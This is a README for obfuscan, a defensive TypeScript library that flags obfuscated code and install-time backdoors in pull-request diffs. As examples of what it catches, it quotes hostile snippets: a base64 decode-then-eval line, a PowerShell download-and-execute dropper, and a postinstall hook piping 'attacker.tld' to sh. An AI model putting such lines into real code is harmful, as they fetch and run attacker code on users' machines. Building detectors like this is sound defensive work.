@obfuscan/core
v0.1.0
Published
Detect obfuscated code and likely backdoors in pull-request diffs. Multi-language. Diff-aware. Pure TypeScript.
Downloads
98
Maintainers
Readme
obfuscan
Detect obfuscated code and likely backdoors in pull-request diffs. Multi-language. Embeddable. Diff-aware. Pure TypeScript.
What it does
obfuscan reads a unified diff (or an explicit file list) and returns findings that flag the two patterns nearly every supply-chain attack relies on:
- Obfuscation — code deliberately hard for a human to read: high-entropy string blobs, encoded payload arrays, bidi/homoglyph identifiers, machine-generated identifier names.
- Dynamic / install-time execution — code with the means to run attacker-controlled bytes:
eval,Function,Invoke-Expression,pickle.loads,Reflection.Assembly.Load,postinstallhooks,curl … | sh, etc.
When the two combine — a decoder feeding a sink — that's the highest-precision malware shape across every language we've tested. obfuscan flags it.
$ obfuscan scan diff.patch
src/loader.ts:42:0 BLOCK [obf.decode-then-exec.typescript]
Decoded data is being executed via a dynamic sink.
> eval(Buffer.from(_0x4f3a[1], 'base64').toString())
src/loader.ts:11:0 WARN [obf.encoded-array-fingerprint]
Found 40 encoded-looking string literals (100% of literals).
package.json:23:5 BLOCK [obf.manifest-install-script]
postinstall hook fetches a URL and pipes the result to a shell.
3 findings · 2 block · 1 warnWhy
Existing tools each cover a slice:
- Semgrep — generic AST patterns, but no entropy/data-flow and not focused on obfuscation.
- Bandit / njsscan — single-language.
- Apiiro PRevent — Python runtime, GitHub-Action-shaped, not a library.
- Datadog GuardDog — scans published packages, not PRs.
- Socket.dev / Snyk — closed source SaaS.
The gap obfuscan fills: a TypeScript-native, embeddable, multi-language, diff-aware detector. Drop it into any Node tool — a Git client, a Husky hook, a VS Code extension, a custom GitHub Action, a CI script — and get findings on the lines that actually changed.
Install
npm install @obfuscan/core @obfuscan/rules
# or
pnpm add @obfuscan/core @obfuscan/rulesThe core package ships the engine; rules ships language configs and tree-sitter query assets, not parser grammars. Hosts that want parser-backed custom detectors provide their own grammars via RuleSet.loadGrammar() / GrammarHandle.parse(). We use SemVer for the engine and CalVer (2026.04.0) for the rules.
Using @obfuscan/rules
@obfuscan/core loads language configs from @obfuscan/rules by default, so normal usage is just installing both packages.
import { scan } from "@obfuscan/core";
import * as fs from "node:fs/promises";
const result = await scan(
{ diff: await fs.readFile("pr.diff", "utf8") },
{ fileResolver: (p) => fs.readFile(p, "utf8") },
);You can also load a custom rules directory:
import { loadRuleSet, scan } from "@obfuscan/core";
import * as fs from "node:fs/promises";
const rules = await loadRuleSet({
languageDir: "./my-rules/languages",
queryDir: "./my-rules/queries",
});
const result = await scan(
{ paths: ["src/file.ts"] },
{
fileResolver: (p) => fs.readFile(p, "utf8"),
rules,
},
);Notes:
@obfuscan/coreuses SemVer.@obfuscan/rulesuses CalVer (YYYY.MM.PATCH) and can update independently.- Rule config schema:
packages/rules/languages/_schema.json
Quick start
Library
import { scan } from "@obfuscan/core";
import * as fs from "node:fs/promises";
const result = await scan(
{ diff: await fs.readFile("pr.diff", "utf8") },
{ fileResolver: (path) => fs.readFile(path, "utf8") },
);
for (const f of result.findings) {
if (f.severity === "block") {
console.error(`${f.file}:${f.line} BLOCK [${f.ruleId}] ${f.reason}`);
}
}What it catches (with real examples)
- Decode-then-execute, the canonical malware shape:
eval(Buffer.from(_0x4f3a[1], 'base64').toString()) - String-array obfuscator output (verbatim from the 2026 axios compromise):
var _0x4f3a = ['dGVzdA==', 'aGVsbG8=', /* …128 more… */]; - PowerShell network-then-exec droppers:
IEX (New-Object Net.WebClient).DownloadString($url) curl | shin install hooks:"postinstall": "curl https://attacker.tld/x | sh"- Trojan Source bidi attacks (any language with Unicode source).
- Pickle / Marshal / unserialize on untrusted input.
- Setup.py top-level imperative code that fetches and executes at install time.
- build.rs with suspicious network behavior.
- Homoglyph identifiers (Latin/Cyrillic mixing).
The detector list is in docs/detectors.md. See docs/coverage.md for per-language coverage.
Language coverage
Universal detectors run on any readable text file.
Language-aware detectors are currently implemented for:
- Tier 1: JavaScript, TypeScript, Python, PowerShell, Bash, PHP, Ruby
- Tier 2: Go, Rust, C#, Java, Kotlin, Lua, Perl, VBScript
Path-based manifest detectors currently target package.json, setup.py, build.rs, GitHub Actions workflows, and Dockerfile.
See docs/coverage.md for the up-to-date matrix by rule and language.
How it works
obfuscan runs a layered pipeline over each file selected by diff or paths input:
input → file context → detectors → suppress/filter → sorted findings- Layer A — universal, raw text. Shannon entropy on long literals, line length, bidi/homoglyph control chars, encoded-string-array regex. Fires on every language.
- Layer B — language-aware heuristics. Generic detectors routed by detected language id: dynamic execution with non-literals, decode-then-exec, network-then-exec, deserializer usage, suspicious I/O clusters, and related patterns.
- Layer C — manifest/path rules. Specialized detectors for
package.json,setup.py,build.rs,.github/workflows/*, andDockerfile.
Each detector emits findings with a 0–10 score and info / warn / block severity. Findings are then filtered (diff ranges, directives, allowlists), sorted, and returned in ScanResult.
Architecture details: docs/architecture.md.
Suppression
False positives are inevitable in security tooling. obfuscan ships first-class suppression:
- Path allowlist for vendored / minified / generated code.
- Per-finding suppression keyed by
(ruleId, sha256(snippet)), persisted by hosts in.obfuscan/allowlist.jsonvialoadAllowlist(),saveAllowlist(), andhashSnippet(). - In-source comment suppressions:
// obfuscan-disable-next-line obf.decode-then-exec.
Honest limits
- Static analysis cannot defeat static analysis. xz is the existence proof. The goal is to raise attacker cost and surface unsophisticated attempts — not to prove malice.
- Binary blobs need a separate scanner (YARA, file-magic). obfuscan flags the metadata signal but doesn't analyze byte content.
- Compiled-language and build-system backdoors still need manual review and additional build-focused rules.
- There is no built-in LLM verifier in
@obfuscan/coretoday.
Comparison
| | obfuscan | Semgrep | PRevent | GuardDog | Bandit | |---|---|---|---|---|---| | Embeddable as TS/JS library | ✓ | — | — | — | — | | Diff/PR-aware | ✓ | partial | ✓ | — | — | | Multi-language | ✓ (15+ deep, 60+ universal) | ✓ | ✓ (15) | ✓ (3) | — | | Entropy / data-flow | ✓ | — | ✓ | ✓ | partial | | Manifest detectors | ✓ | partial | ✓ | ✓ | — | | Pure offline, no SaaS | ✓ | ✓ | ✓ | ✓ | ✓ | | Open source | ✓ Apache-2.0 | LGPL/commercial | Apache-2.0 | Apache-2.0 | Apache-2.0 |
Project status
Pre-1.0. The detector framework, scoring, suppression, and tier-1/tier-2 language rules are stable. Breaking API changes are batched into minor releases until 1.0; rule changes ship as patch CalVer releases of @obfuscan/rules and never require an engine update.
Roadmap
- [x] Tier-1 language rules (JS/TS, Python, PowerShell, Bash, PHP, Ruby)
- [x] Manifest detectors for npm, PyPI, GitHub Actions, Dockerfile
- [x] Tier-2 language rules (Go, Rust, C#, Java, Kotlin, Lua, Perl, VBScript)
- [ ]
@obfuscan/cli1.0 with SARIF output - [ ]
@obfuscan/github-action - [ ]
@obfuscan/llm-verifyoptional Layer-D package - [ ] Reproducible benchmark suite against Datadog malicious-software-packages-dataset
Contributing
Adding rules is the highest-leverage contribution. Most rule contributions are 3-line PRs to a JSON file. See CONTRIBUTING.md.
Bug reports, false-positive reports, and bypasses welcome — see SECURITY.md for how to report bypasses privately.
Acknowledgements
obfuscan's detection model is informed by published work from Apiiro (PRevent), Datadog (GuardDog, BewAIre), Phylum, Veracode, and the academic literature on entropy-based malware detection. The public taxonomy of PowerShell obfuscation comes from Daniel Bohannon's Invoke-Obfuscation. Where a specific paper or post directly informed a detector, it is cited inline in the source.
License
Apache-2.0. See LICENSE.
